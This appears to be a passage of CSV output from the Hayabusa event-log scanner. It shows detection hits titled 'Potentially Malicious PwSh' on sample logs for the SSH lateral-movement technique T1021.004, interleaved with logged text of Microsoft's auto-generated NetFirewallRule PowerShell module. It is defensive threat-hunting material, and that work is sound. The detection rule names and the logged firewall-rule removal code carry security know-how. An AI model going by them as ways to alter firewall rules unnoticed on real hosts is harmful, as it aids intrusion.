$__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 
'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { 
$__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetFirewallRule' -Alias '*' function Rename-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) 
$__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 
'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { 
$__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetFirewallRule' -Alias '*' function Rename-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] 
[ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] 